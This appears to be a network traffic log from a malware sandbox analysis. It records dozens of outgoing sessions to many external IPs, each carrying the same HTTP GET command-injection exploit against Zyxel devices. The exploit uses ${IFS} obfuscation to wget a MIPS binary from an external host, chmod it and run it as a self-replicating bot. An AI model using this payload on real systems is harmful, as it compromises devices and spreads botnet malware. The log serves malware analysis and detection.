                                                  Jan 19, 2024 18:23:01.544759989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  307192.168.2.1341856153.217.39.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.544810057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  308192.168.2.1351510192.178.221.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.544914007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  309192.168.2.1344060142.101.255.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.544976950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  310192.168.2.134403441.213.92.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.545012951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  311192.168.2.1350128156.180.244.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.545057058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  312192.168.2.135146862.42.176.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.545089006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  313192.168.2.134273839.78.238.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.545259953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  314192.168.2.1354564112.136.147.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.545274973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  315192.168.2.135103243.238.89.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.545317888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  316192.168.2.1334612172.72.73.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.545432091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  317192.168.2.1356086197.33.39.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.545481920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  318192.168.2.1347634146.74.222.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.545550108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  319192.168.2.1347682128.100.63.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.545612097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  320192.168.2.1349970164.132.117.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.545686960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  321192.168.2.1360178201.167.86.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.545722008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  322192.168.2.133830275.250.20.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.545759916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  323192.168.2.1335864219.123.252.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:01.545845985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  324192.168.2.133636485.83.23.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:02.515636921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  325192.168.2.1351076204.135.93.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:02.515707970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  326192.168.2.134807838.198.54.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:02.515757084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  327192.168.2.1352676104.202.221.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:02.515794039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  328192.168.2.1336790135.166.31.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:02.515883923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  329192.168.2.133793891.13.127.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:02.543354034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  330192.168.2.134451468.101.112.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:03.549408913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  331192.168.2.134578867.188.134.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:03.549443960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  332192.168.2.134193851.63.49.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:03.549513102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  333192.168.2.133653431.218.67.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:04.555587053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  334192.168.2.13339065.185.149.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:04.555634022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  335192.168.2.1343038126.142.88.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:04.555708885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  336192.168.2.1340106191.249.61.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:04.555743933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  337192.168.2.1335532146.68.183.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:04.555788994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  338192.168.2.134338271.73.182.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:04.555942059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  339192.168.2.1334748185.132.211.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:04.555974960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  340192.168.2.1348454174.54.189.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:04.556087971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  341192.168.2.1349384110.63.158.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:05.562654972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  342192.168.2.1343242194.92.169.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:05.562707901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  343192.168.2.133465679.41.137.46443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:05.562813044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  344192.168.2.1346252211.14.234.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:05.562868118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  345192.168.2.135212075.191.229.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:05.562938929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  346192.168.2.134612432.106.230.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:05.563035011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  347192.168.2.133992083.85.16.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:05.563158035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  348192.168.2.1344704116.111.10.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:06.567838907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  349192.168.2.135718045.175.126.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:06.567868948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  350192.168.2.134470676.85.228.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:06.567945957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  351192.168.2.135198493.93.202.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:06.568068027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  352192.168.2.13478401.119.230.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:07.573409081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  353192.168.2.134179698.21.143.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:07.573507071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  354192.168.2.1343338187.175.194.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:08.578651905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  355192.168.2.1352454211.222.203.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:08.578702927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  356192.168.2.134150048.23.157.114443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:08.578769922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  357192.168.2.1333472207.85.253.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:08.578836918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  358192.168.2.133598090.244.188.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:08.578871012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  359192.168.2.1358856114.11.75.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:09.583785057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  360192.168.2.1355936209.156.153.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:09.583873987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  361192.168.2.1351174116.238.17.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:09.583906889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  362192.168.2.1345806179.110.201.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:10.589207888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  363192.168.2.1342278210.85.226.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:10.589291096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  364192.168.2.1354846164.217.45.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:10.589409113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  365192.168.2.1360908197.249.94.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:10.589526892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  366192.168.2.134679481.181.227.236443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:10.589596987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  367192.168.2.1344460129.5.92.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:10.589607954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  368192.168.2.1355614112.254.233.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:11.593516111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  369192.168.2.1358592173.41.126.217443
                                                  TimestampBytes transferredDirectionData
